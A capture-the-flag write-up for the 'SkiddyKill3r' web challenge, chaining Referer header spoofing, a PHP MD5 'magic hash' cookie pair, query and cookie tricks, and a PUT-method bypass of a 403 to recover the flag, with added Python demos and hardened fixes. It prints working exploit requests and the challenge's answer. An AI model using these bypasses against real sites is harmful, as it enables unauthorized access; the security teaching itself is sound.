SkiddyKill3r

This writeup details the complete breakdown of the SkiddyKill3r web challenge, a rigorous test of reconnaissance and creative problem-solving. The path to the flag required chaining multiple exploits: from Referer header spoofing and leveraging a classic PHP MD5 hash collision vulnerability, all the way to bypassing a 403 Forbidden error using the PUT method to discover a secret User-Agent string hidden deep within the server’s configuration.

Challenge Description:

```text
Creative Thinking will make getting the flag so much easier
```

We visit the site.

When we search for a user like admin, this is the output.

As always, we read the page's source code, and in it we find these comments:

```html
<!-- Your Hint Is admin  To Get Hint Maybe Your Name Or Mine -->
<!-- Momen Is A Good Name Too -->
<!-- Just Try To Brute Them (Manually)-->
```

Searching for Momen gives a success.

Now we can visit the page at /hint.php.

From the hint page we need to add a parameter to the request.

```text
/hint.php?show=True
/hint.php?show=False
```

Setting the parameter to True, we get the PHP source code.

```php
<?php

// Our Site Have robots.txt Too

require_once("real_flag.php");

if(isset($_GET['show']) && $_GET['show']==='True')
    show_source(__FILE__);
else
    echo("Parameter is good even it was <b>True</b> or <b>False</b>");


if(isset($_SERVER['HTTP_REFERER']) && $_SERVER['HTTP_REFERER']==='http://cyberguy')
    echo($flag1);
else

    echo("<br>Nothing To <b>show</b> Here !<br>");


if (isset($_COOKIE['flag']) &&  isset($_COOKIE['flag1']))
    {
        if($_COOKIE['flag'] != $_COOKIE['flag1'])
        {
            if(md5($_COOKIE['flag'])==md5($_COOKIE['flag1']))
            {
               echo "$flag2";
             }
        }
    
     }

if (isset($_GET['flag']) && $_GET['flag'] == "HiNt" && isset($_COOKIE['flag']) && $_COOKIE['flag'] == "True"){
    echo $hint;
};


/*
To Get The Final Flag Try To Search About The Right User-Agent And File ;) 
Remember: - The Flag Not Always Exits In What We See
*/
echo "<br><br>";
echo "Your User Agent : - <pre><b>" . htmlspecilachars($_SERVER['HTTP_USER_AGENT']) . "</b></pre> I Think You Need It ;)"  . "\n\n";

?>
```

The first line is a comment that points us to the robots.txt file.

```shell
curl http://cdcamxwl32pue3e6m4m236nlbg301p6v4yk5xix3g-web.cybertalentslabs.com/robots.txt

User-agent: *
Disallow: /
Allow: /index.php
Allow: /flag.php
Allow: /flag1.jpg
Disallow: /robots.txt.php #-> Access Here To Get The Final Flag ;)
```

Let's visit the listed pages. /index.php:

We get page not found.

/flag.php:

Nothing here either 🤦, and I am sure you don't want to visit /flag1.jpg.

Back to the source code review, this part piques our interest.

```php
if(isset($_SERVER['HTTP_REFERER']) && $_SERVER['HTTP_REFERER']==='http://cyberguy')
    echo($flag1);
else
```

This means our request should include a Referer header with the value http://cyberguy (the server reads it as $_SERVER['HTTP_REFERER']).

```http
Referer: http://cyberguy
```

Sending the request, we get the first part of the flag.

flag1 = 0xL4ugh{H3r0_

For flag two we have to satisfy these conditions.

```php
if (isset($_COOKIE['flag']) &&  isset($_COOKIE['flag1']))
    {
        if($_COOKIE['flag'] != $_COOKIE['flag1'])
        {
            if(md5($_COOKIE['flag'])==md5($_COOKIE['flag1']))
            {
               echo "$flag2";
             }
        }
    
     }
```

Summarized, we have:

```text
- condition 1
Cookie: flag=
Cookie: flag1=

- condition 2
flag != flag1

- condition 3
md5(flag) == md5(flag1)
```

To satisfy this we use a well-known PHP "magic hash" pair. The MD5 digest of each value is 0e followed only by digits; because the comparison is the loose == rather than ===, PHP treats both digests as numeric strings equal to zero, so the hashes compare equal even though the cookie values differ.

```http
Cookie: flag=240610708; flag1=QNKCDZO
```

flag2 = I5_
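To see why that cookie pair passes the check, here is an added Python example (my own code, not part of the writeup or the challenge). It emulates PHP's loose == for strings, reproduces the flag2 gate with both the loose and the strict comparison, and includes a small defender-side triage helper that flags submitted values whose MD5 digest has the 0e<digits> shape. The function names and the sample value list are my own.

```python
import hashlib
import hmac
import re

# PHP reads a string as numeric when it parses as an int or float literal,
# which includes scientific notation: "0e12345" is the float 0.0.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")

# An MD5 hex digest that is "0e" followed only by digits is numeric zero to PHP.
_MAGIC_DIGEST = re.compile(r"^0e\d+$")


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's `==` on two strings: numeric strings are compared as numbers."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """PHP's `===` (or hash_equals): same bytes, no type juggling, constant time."""
    return hmac.compare_digest(a.encode(), b.encode())


def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode()).hexdigest()


def is_magic_md5(value: str) -> bool:
    """True when md5(value) looks like 0e<digits>, the shape magic-hash pairs rely on."""
    return _MAGIC_DIGEST.match(md5_hex(value)) is not None


def flag2_gate(flag: str, flag1: str, strict: bool = False) -> bool:
    """The writeup's flag2 check: distinct cookies whose MD5 digests compare equal.

    strict=False reproduces the challenge's `==`; strict=True is the fixed version.
    """
    eq = php_strict_eq if strict else php_loose_eq
    if eq(flag, flag1):
        return False
    return eq(md5_hex(flag), md5_hex(flag1))


def flag_magic_values(values):
    """Defender-side triage: which of these submitted values are magic-hash candidates?"""
    return [v for v in values if is_magic_md5(v)]


if __name__ == "__main__":
    # Constructed sample of cookie values as they might appear in a request log.
    seen = ["admin", "Momen", "240610708", "QNKCDZO", "True"]
    print("magic-hash candidates:", flag_magic_values(seen))
    print("loose gate :", flag2_gate("240610708", "QNKCDZO"))
    print("strict gate:", flag2_gate("240610708", "QNKCDZO", strict=True))
```

The fix on the PHP side is the same as `strict=True` here: compare digests with === or hash_equals(), so the numeric-string rule never applies.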

The next part gives us a hint, but we need to satisfy its conditions.

```php
if (isset($_GET['flag']) && $_GET['flag'] == "HiNt" && isset($_COOKIE['flag']) && $_COOKIE['flag'] == "True"){
    echo $hint;
}
```

Conditions:

  • a GET parameter named flag
  • set that parameter to HiNt
  • set the cookie flag=True

Here is how the request should look:

```http
GET /hint.php?flag=HiNt HTTP/1.1
Host: 

Cookie: flag=True
```

Sending the request, we get the hint:

```text
Your Hint Is :- Go To _/robots.txt_ You May Find Any Thing Help You
```

Since we have already visited all the allowed pages in robots.txt, let's try the disallowed page, /robots.txt.php. The robots.txt comment does say:

```text
Disallow: /robots.txt.php #-> Access Here To Get The Final Flag ;)
```

Visiting the page we get a 403 error. To bypass this:

  • I added the cookies we used to get flag 2
  • and changed the HTTP method to PUT

We get:

  • /user_check.php, a new page that was not listed in robots.txt
  • User Agent :- G3t_My_Fl@g_N0w(), which is crucial, since several hints pointed to the User-Agent
  • /real_flag.php is now allowed

With this we can craft requests to /real_flag.php and /user_check.php with the User-Agent set to G3t_My_Fl@g_N0w().
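The request chain above (Referer for flag 1, the cookie and parameter for the hint, and the method switch on /robots.txt.php) replayed against a local mock, as an added Python example. This is my own code, not the challenge or the writeup's. The mock only imitates the behaviour the writeup describes; in particular it assumes the 403 came from a method-scoped rule that covered GET but not PUT, which is a common cause of this kind of bypass but is not confirmed by the page. The flag1 and hint strings are copied from the writeup; the listing text and all function names are constructed. A second handler shows the deny-by-default fix, under which the PUT request is refused as well.

```python
import threading
import http.client
from http import HTTPStatus
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# FLAG1 and HINT are taken from the writeup; LISTING is a constructed stand-in.
FLAG1 = "0xL4ugh{H3r0_"
HINT = "Your Hint Is :- Go To _/robots.txt_ You May Find Any Thing Help You"
LISTING = "/user_check.php\nUser Agent :- G3t_My_Fl@g_N0w()\n/real_flag.php"


class ChallengeHandler(BaseHTTPRequestHandler):
    """Mock of the observable behaviour in the writeup (not the real application)."""

    def is_denied(self):
        # Assumption: the rule behind the 403 only covered GET, so PUT slipped past.
        return self.command == "GET"

    def log_message(self, *args):  # keep the console quiet
        pass

    def _send(self, status, body):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        self._route()

    def do_PUT(self):
        self._route()

    def _route(self):
        url = urlparse(self.path)
        if url.path == "/hint.php":
            out = []
            # Referer is set by the client, so it cannot act as an access check.
            if self.headers.get("Referer") == "http://cyberguy":
                out.append(FLAG1)
            cookies = SimpleCookie(self.headers.get("Cookie", ""))
            flag_cookie = cookies["flag"].value if "flag" in cookies else None
            if parse_qs(url.query).get("flag") == ["HiNt"] and flag_cookie == "True":
                out.append(HINT)
            self._send(HTTPStatus.OK, "\n".join(out) or "Nothing To show Here !")
        elif url.path == "/robots.txt.php":
            if self.is_denied():
                self._send(HTTPStatus.FORBIDDEN, "Forbidden")
            else:
                self._send(HTTPStatus.OK, LISTING)
        else:
            self._send(HTTPStatus.NOT_FOUND, "Not Found")


class HardenedHandler(ChallengeHandler):
    """Deny by default: the restriction applies to every method, not just GET."""

    def is_denied(self):
        return True


def serve(handler):
    srv = HTTPServer(("127.0.0.1", 0), handler)  # port 0 = any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def request(port, method, path, headers=None):
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request(method, path, headers=headers or {})
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, body


def walk_chain(handler=ChallengeHandler):
    """Replay the writeup's requests against the mock; returns {step: (status, body)}."""
    srv = serve(handler)
    port = srv.server_address[1]
    try:
        return {
            "referer": request(port, "GET", "/hint.php", {"Referer": "http://cyberguy"}),
            "hint": request(port, "GET", "/hint.php?flag=HiNt", {"Cookie": "flag=True"}),
            "get_robots": request(port, "GET", "/robots.txt.php"),
            "put_robots": request(port, "PUT", "/robots.txt.php"),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for name, (status, body) in walk_chain().items():
        print(f"{name}: {status} {body.splitlines()[0] if body else ''}")
    print("hardened PUT:", walk_chain(HardenedHandler)["put_robots"][0])
```

The point of the hardened handler is that a path restriction should not be expressed per method: anything a Limit-style rule leaves out (PUT here, but equally HEAD, OPTIONS or a made-up verb) becomes a bypass.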

Final flag:

```text
0xL4ugh{H3r0_I5_You0_F0r_N0w}
```

This post is licensed under CC BY 4.0 by the author.